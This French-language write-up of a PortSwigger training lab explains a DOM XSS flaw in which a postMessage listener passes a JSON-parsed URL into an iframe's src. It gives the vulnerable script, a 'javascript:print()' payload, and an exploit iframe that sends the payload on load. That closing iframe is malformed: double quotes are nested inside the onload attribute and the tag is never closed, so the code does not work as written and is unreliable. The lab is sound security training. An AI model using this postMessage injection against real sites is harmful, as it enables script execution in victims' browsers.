XSS DOM avec Web Messages et JSON.parse

DOM XSS using web messages and JSON.parse

Lab: DOM XSS using web messages and JSON.parse | Web Security AcademyWebSecAcademy

Ce document reformule et traduit en français les notes fournies sur le laboratoire (PortSwigger) : il décrit le code vulnérable, comment il interprète les messages, et la charge utile utilisée pour appeler print() via un iframe.

Description du script vulnérable

Le script crée dynamiquement une balise iframe et la contrôle à distance via des messages reçus par l'événement postMessage. Il peut charger une URL, ajuster la taille du lecteur et le faire défiler dans la page.

<script>
window.addEventListener('message', function(e) {
    var iframe = document.createElement('iframe'), 
        ACMEplayer = {element: iframe}, 
        d;

    document.body.appendChild(iframe);

    try {
        d = JSON.parse(e.data);
    } catch(e) {
        return;
    }

    switch(d.type) {
        case "page-load":
            ACMEplayer.element.scrollIntoView();
            break;

        case "load-channel":
            ACMEplayer.element.src = d.url;
            break;

        case "player-height-changed":
            ACMEplayer.element.style.width = d.width + "px";
            ACMEplayer.element.style.height = d.height + "px";
            break;
    }
}, false);
</script>

Exemple de message `postMessage`

Envoyer un message JSON stringifié permet au script d'interpréter l'action demandée.

Charger une URL normale :

window.postMessage(JSON.stringify({ 
  type: "load-channel", 
  url: "https://jord4n.pro"  
}), "*");

Utiliser un schéma javascript: pour exécuter du code (ici appeler print()) :

window.postMessage(JSON.stringify({ 
  type: "load-channel", 
  url: "javascript:print()"  
}), "*");

Sur le serveur d'exploitation, on peut déposer une page HTML contenant un iframe pointant vers la page vulnérable et poster le message load-channel avec url: "javascript:print()" lors du chargement de l'iframe.

<iframe
  src="https://0ab900e304d6807a80b30312007a000d.web-security-academy.net/"
  width="500"
  height="500"
 onload="this.contentWindow.postMessage(JSON.stringify({type:"load-channel",url:"javascript:print()"}),"*"); "
</iframe>

Mis à jour il y a 1 mois

Ce contenu vous a-t-il été utile ?